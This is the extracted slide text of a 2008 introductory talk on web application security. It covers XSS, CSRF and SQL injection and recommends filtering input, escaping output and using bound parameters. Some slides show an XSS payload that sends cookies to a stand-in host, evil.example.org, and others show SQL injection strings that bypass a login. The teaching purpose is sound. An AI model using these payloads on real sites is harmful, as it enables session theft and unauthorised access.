Web Application Security 101 (Schematicon 2008)

Embed

Start on current slide

Slide 1

Slide 1 text

Ben Ramsey ■ Schematic Tech Summit ■ 26 Sep 2008 Web Application Security 101

Slide 2

Slide 2 text

me worry? What,

Slide 3

Slide 3 text

Excuses...

Slide 4

Slide 4 text

Excuses... my site is too small no one will ﬁnd it no one would do that we don’t have the time it’s too confusing

Slide 5

Slide 5 text

Security by Obscurity

Slide 6

Slide 6 text

Source: http://xkcd.com/257/

Slide 7

Slide 7 text

Overview cross-site scripting cross-site request forgeries SQL injection ﬁltering input escaping output

Slide 8

Slide 8 text

Filter Input

Slide 9

Slide 9 text

3. distinguish between ﬁltered and tainted data 1. identify input 2. ﬁlter the input

Slide 10

Slide 10 text

Username:
Select a color: red blue green

Slide 11

Slide 11 text

Slide 12

Slide 12 text

Escape Output

Slide 13

Slide 13 text

3. distinguish between escaped and unescaped data 1. identify output 2. escape the output

Slide 14

Slide 14 text

Welcome back, {$html[‘username’]}.

”; ?>

Slide 15

Slide 15 text

Cross-site scripting XSS

Slide 16

Slide 16 text

Exploits user’s trust in a website.

Slide 17

Slide 17 text

Attacker forum.example.org 1 POST /reply.php HTTP/1.1 Host: forum.example.org Content-Length: 162 threadId=743&message=%3Cscript%3Edocument.location+ %3D+%27http%3A%2F%2Fevil.example.org%2Fsteal.php %3Fcookies%3D%27+%2B+escape%28document.cookie%29%3C %2Fscript%3E

Slide 18

Slide 18 text

3   document.location =   'http://evil.example.org/steal.php?cookies=' + escape(document.cookie) 2 forum.example.org evil.example.org 4 GET /steal.php?cookies=username%3Dramsey%3B PHPSESSID%3D9gd2c7sp50luvorrjdl8dus214 HTTP/1.1 Host: evil.example.org Victim

Slide 19

Slide 19 text

The vulnerable site outputs tainted, unescaped data.

Slide 20

Slide 20 text

$user says:
”; echo “$message

”; ?>

Slide 21

Slide 21 text

$user says:
”; echo “$message

”; ?> $user $message

Slide 22

Slide 22 text

The $user and $message variables are displayed in their raw, unescaped form.

Slide 23

Slide 23 text

Cross-site request forgeries CSRF

Slide 24

Slide 24 text

Exploits website’s trust in a user.

Slide 25

Slide 25 text

1 example.org Source: Shiﬂett, Chris. Essential PHP Security. Sebastopol, CA: O’Reilly, 2006. books.example.org 3 GET /buy.php?isbn=059600656X HTTP/1.1 Host: books.example.org Cookie: REMEMBER=qhdw5qClx; SESSID=066a8e6fafb1c Victim

Slide 26

Slide 26 text

Which is the vulnerable site? In this case, both.

Slide 27

Slide 27 text

example.org outputs   unescaped user input. books.example.org trusts that I willingly made the request.

Slide 28

Slide 28 text

Use POST instead of GET. “In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the signiﬁcance of taking an action other than retrieval. These methods ought to be considered ‘safe’. This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested.” –Section 9.1.1, RFC 2616

Slide 29

Slide 29 text

Don’t focus on convenience.

Slide 30

Slide 30 text

Force the use of your own forms.

Slide 31

Slide 31 text

SQL Injection

Slide 32

Slide 32 text

Source: http://xkcd.com/327/

Slide 33

Slide 33 text

Slide 34

Slide 34 text

foo’ or 1 = 1 --

Slide 35

Slide 35 text

SELECT * FROM users WHERE username = ‘foo’ or 1 = 1 --’ AND password = ‘a029d0df84eb5549c641e04a9ef389e5’

Slide 36

Slide 36 text

ramsey’ --

Slide 37

Slide 37 text

SELECT * FROM users WHERE username = ‘ramsey’ --’ AND password = ‘a029d0df84eb5549c641e04a9ef389e5’

Slide 38

Slide 38 text

Always ﬁlter input and escape output! When available, use bound parameters for database queries.

Slide 39

Slide 39 text

Slide 40

Slide 40 text

prepare($sql); $sth->bindParam(‘:user’, $clean[‘username’]); $sth->bindParam(‘:pass’, md5($clean[‘password’])); $sth->execute(); ?>